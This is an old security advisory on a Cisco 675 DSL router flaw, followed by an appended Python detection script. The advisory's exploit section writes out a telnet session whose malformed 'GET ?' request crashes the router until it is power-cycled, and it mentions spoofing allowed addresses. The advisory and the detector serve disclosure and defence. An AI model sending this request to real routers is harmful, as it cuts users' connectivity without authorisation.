Vulnerability

    Cisco

Affected

    Cisco 675 DSL Router

Description

CDI found the following. The Cisco 675 DSL routers with the Web Administration Interface enabled can be crashed (hard) using a simple GET request. CBOS versions 2.0.x through 2.2.x have been found to be vulnerable. The new CBOS 2.3.x has not been tested, but there are no notes in the 2.3.x changelogs to indicate that they've fixed this problem. Affected 675s were configured in PPP mode. The 'Web Administration Interface' is enabled by default in CBOS revisions 2.0.x and 2.2.x.

The Cisco 67x series of DSL routers are produced and distributed for specific telcos to offer to their clients and as such, the installation base is quite large. (To hazard a guess, if just 20% of all Qwest DSL users are using Cisco 675s, the installation base would exceed 25,000.) The DSL adapters in this series include: Cisco 673, Cisco 675, Cisco 675e, Cisco 676, Cisco 677, and Cisco 678.

This advisory applies specifically to the 675, but other adapters in this series may have similar problems and should be tested for vulnerability to this type of attack. The CBOS codebase is an acquired OS and as such has no relationship at all to the main Cisco IOS codebase.

Exploit:

    telnet vic.tim.ip.addr 80
    Connected to vic.tim.ip.addr.
    Escape character is '^]'.
    GET / HTTP/1.0

    HTTP/1.0 401 Unauthorized
    Content-type: text/html
    WWW-Authenticate: Basic realm="CISCO_WEB"

    <CENTER><h1>Unauthorized Access 401</h1></center>
    Connection closed by foreign host.

Now kill it:

    telnet vic.tim.ip.addr 80
    Trying vic.tim.ip.addr...
    Connected to vic.tim.ip.addr.
    Escape character is '^]'.
    GET ? [LF][LF]

Your telnet session dies here, and so does the router. Dead as a post:

    ping -c5 vic.tim.ip.addr
    PING vic.tim.ip.addr (vic.tim.ip.addr): 56 data bytes
    5 packets transmitted, 0 packets received, 100% packet loss

The Cisco never recovers - it's hosed until the router is power-cycled. A simple 'GET ? \n\n' is all it takes to kill the router.
In case you're wondering, CDI had meant to enter 'GET /', but his finger slipped on the shift key. Neat, eh?

This exploit works on a Cisco 677 running CBOS 2.2.0.002. It does not work when you specify the web server to only accept connections from certain IPs. You could spoof them, but have fun guessing the IP.

Solution

Disable the Web Based Administration Interface in your 675 until a patch or CBOS revision is made available. Web Server Disable commands (2.0.x or better), entered in CBOS 'enable' mode:

    cbos# set web disabled
    cbos# write
    cbos# reboot

For solution see:

    http://oliver.efri.hr/~crv/security/bugs/Others/cisco43.html
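For sites that must leave the web interface enabled for a while, the two conditions described above (a request line whose target is not a path, and a source outside the permitted management addresses) can be checked against traffic captured in front of the router. The following is an added example, not code from the advisory; the record format, the allow-list range, the finding names and the sample records are all constructed for illustration.

```python
import ipaddress
import re

# Assumption: only these management stations should reach the router's web port.
ALLOWED_SOURCES = [ipaddress.ip_network("192.0.2.0/28")]
METHODS = {"GET", "HEAD", "POST"}
VERSION = re.compile(r"HTTP/\d\.\d")

def check_request(src_ip, first_line):
    """Return the list of findings for one request seen on the web admin port."""
    findings = []
    if not any(ipaddress.ip_address(src_ip) in net for net in ALLOWED_SOURCES):
        findings.append("source-not-allowed")
    parts = first_line.strip("\r\n").split()
    if len(parts) not in (2, 3):
        return findings + ["malformed-request-line"]
    method, target = parts[0], parts[1]
    if method not in METHODS:
        findings.append("unexpected-method")
    # A request-target must be origin-form ("/..."), absolute-form, or "*".
    if not (target.startswith("/") or target.startswith("http://") or target == "*"):
        findings.append("bad-request-target")
    if len(parts) == 2:
        findings.append("no-http-version")  # HTTP/0.9-style request, worth a look
    elif not VERSION.fullmatch(parts[2]):
        findings.append("bad-http-version")
    return findings

def scan(capture):
    """Return (src_ip, request_line, findings) for every flagged record."""
    flagged = []
    for record in capture.splitlines():
        if not record.strip():
            continue
        src_ip, _, line = record.partition("\t")
        findings = check_request(src_ip, line)
        if findings:
            flagged.append((src_ip, line, findings))
    return flagged

# Constructed sample: "<source IP>\t<first request line>" per record.
SAMPLE_CAPTURE = (
    "192.0.2.5\tGET / HTTP/1.0\n"
    "192.0.2.5\tGET ? \n"
    "198.51.100.23\tGET / HTTP/1.0\n"
    "198.51.100.23\tGET ? \n"
)

if __name__ == "__main__":
    for src, line, findings in scan(SAMPLE_CAPTURE):
        print(f"{src:15} {line!r:20} {', '.join(findings)}")
```

Only the first sample record passes cleanly; a flagged request from an allowed source still deserves attention, since the advisory notes that source addresses can be spoofed.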